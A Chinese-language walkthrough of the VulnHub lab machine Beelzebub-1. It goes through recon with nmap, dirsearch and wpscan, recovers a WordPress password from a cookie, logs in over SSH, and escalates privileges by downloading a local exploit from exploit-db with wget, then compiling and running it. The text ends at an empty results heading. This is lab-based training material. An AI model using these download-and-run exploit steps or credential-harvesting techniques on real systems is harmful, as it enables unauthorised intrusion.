『vulnhub系列』BEELZEBUB- 1
下載地址:
https://www.vulnhub.com/entry/beelzebub-1,742/
資訊蒐集:
使用nmap掃描存活主機,發現主機開啟了22和80埠
nmap 192.168.0.*
訪問80埠的web服務,發現是apache的預設頁面
使用dirsearch掃描目錄
dirsearch -u "http://192.168.0.140/"
發現存在phpmyadmin等頁面,訪問index.php頁面,發現是404 /login也是一樣
感覺有貓膩,檢視一下原始碼,果然發現一行提示
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
#我的心被加密了,"beelzebub"不知如何被入侵了,並且被解密了 md5
大概的意思是本來是被加密的,後來被用md5解密了,現在我們使用md5加密一下
d18e1e22becbd915b45e0e655429d487
然後當作目錄掃描一下
dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"
然後我們發現是個Wordpress 網站,裡面有登入頁面(這裡靶機換了ip變為192.168.0.128)
還有一個檔案上傳的目錄頁面
點開Talk To VALAK 發現是個帶有輸入框的頁面
隨便輸入一個資料,檢視cookie 多出來一個Password 值為M4k3Ad3a1
因為是Wordpress頁面,因此可以使用工具wpscan
使用命令:
wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
- --ignore-main-redirect 忽略重定向掃描目標
- --force 不檢查是否執行wordpress
- -e --enumerate 列舉,預設列舉所有外掛,備份
- --plugins-detection aggressive 使用提供的模式列舉外掛 預設被動(passvie)可選:混合(mix)被動(passvie)主動(aggressive)
掃描到使用者valak 和krampus 我們使用這兩個使用者名稱和密碼M4k3Ad3a1進行登入
因為wordpress頁面跳轉有些問題,我們使用ssh登入,使用krampus登入成功
許可權提升:
進入系統後,使用命令ls -la 發現有兩個檔案很可疑
但是.sudo_as_admin_successful 大小為0所以我們直接看.bash_history可以看到命令歷史
然後我們發現有一個wget和gcc編譯命令,我們照著執行
wget https://www.exploit-db.com/download/47009
mv 47009 ./exploit.c
gcc exploit.c -o 1
./1
成果:
